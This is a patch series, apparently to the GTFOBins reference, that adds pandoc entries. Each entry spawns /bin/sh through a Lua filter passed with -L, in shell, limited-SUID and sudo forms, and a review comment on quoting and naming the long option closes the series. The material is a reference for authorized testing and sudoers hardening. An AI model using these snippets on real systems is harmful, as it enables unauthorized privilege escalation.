From 7cb2fcb3754db966125c1d666212750ed4028736 Mon Sep 17 00:00:00 2001
From: Alvin Nguyen
Date: Mon, 4 Sep 2023 00:30:36 -0700
Subject: [PATCH 1/2] Update pandoc.md
---
 _gtfobins/pandoc.md | 12 ++++++++++--
 1 file changed, 10 insertions(+), 2 deletions(-)
diff --git a/_gtfobins/pandoc.md b/_gtfobins/pandoc.md
index 4da3f74f..fe66c66e 100644
--- a/_gtfobins/pandoc.md
+++ b/_gtfobins/pandoc.md
@@ -8,12 +8,20 @@ functions:
 - code: |
 LFILE=file_to_write
 echo DATA | pandoc -t plain -o "$LFILE"
+ shell:
+ - description: |
+ Pandoc has a builtin Lua interpreter for writing filters.
+ - code: |
+ TF=$(mktemp)
+ echo 'os.execute("/bin/sh")' > $TF
+ pandoc -L $TF /dev/null
 suid:
 - code: |
 LFILE=file_to_write
 echo DATA | ./pandoc -t plain -o "$LFILE"
 sudo:
 - code: |
- LFILE=file_to_write
- echo DATA | sudo pandoc -t plain -o "$LFILE"
+ TF=$(mktemp)
+ echo 'os.execute("/bin/sh")' > $TF
+ sudo pandoc -L $TF /dev/null
 ---
From 56710ccb4750abc8da3d3807e1cba5614afdf65c Mon Sep 17 00:00:00 2001
From: Andrea Cardaci
Date: Sat, 23 Dec 2023 13:57:30 +0100
Subject: [PATCH 2/2] Fixup
---
 _gtfobins/pandoc.md | 18 ++++++++++++------
 1 file changed, 12 insertions(+), 6 deletions(-)
diff --git a/_gtfobins/pandoc.md b/_gtfobins/pandoc.md
index fe66c66e..70c77bd7 100644
--- a/_gtfobins/pandoc.md
+++ b/_gtfobins/pandoc.md
@@ -9,19 +9,25 @@ functions:
 LFILE=file_to_write
 echo DATA | pandoc -t plain -o "$LFILE"
 shell:
- - description: |
- Pandoc has a builtin Lua interpreter for writing filters.
- - code: |
+ - description: Pandoc has a builtin [`lua`](/gtfobins/lua/) interpreter for writing filters, other functions might apply.
+ code: |
 TF=$(mktemp)
- echo 'os.execute("/bin/sh")' > $TF
+ echo 'os.execute("/bin/sh")' >$TF
 pandoc -L $TF /dev/null
 suid:
 - code: |
 LFILE=file_to_write
 echo DATA | ./pandoc -t plain -o "$LFILE"
+ limited-suid:
+ - description: Pandoc has a builtin [`lua`](/gtfobins/lua/) interpreter for writing filters, other functions might apply.
+ code: |
+ TF=$(mktemp)
+ echo 'os.execute("/bin/sh")' >$TF
+ ./pandoc -L $TF /dev/null
 sudo:
- - code: |
+ - description: Pandoc has a builtin [`lua`](/gtfobins/lua/) interpreter for writing filters, other functions might apply.
+ code: |
 TF=$(mktemp)
- echo 'os.execute("/bin/sh")' > $TF
+ echo 'os.execute("/bin/sh")' >$TF
 sudo pandoc -L $TF /dev/null
 ---
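Review bot: `$TF` is left unquoted in the three Lua-filter snippets of this hunk (`shell`, `limited-suid`, `sudo`) although the neighbouring examples quote `"$LFILE"`; for consistency, and so the example still works when `TMPDIR` contains spaces, write `echo 'os.execute("/bin/sh")' >"$TF"` and `pandoc -L "$TF" /dev/null`. The description repeated on those three entries is a comma splice and would read better as two sentences. It could also name the option in full (`-L` is the short form of `--lua-filter`), so that a sudoers review or a command-line detection written from this entry matches both spellings. The front matter opens above the hunk, so the entries before `file-write` are not visible here.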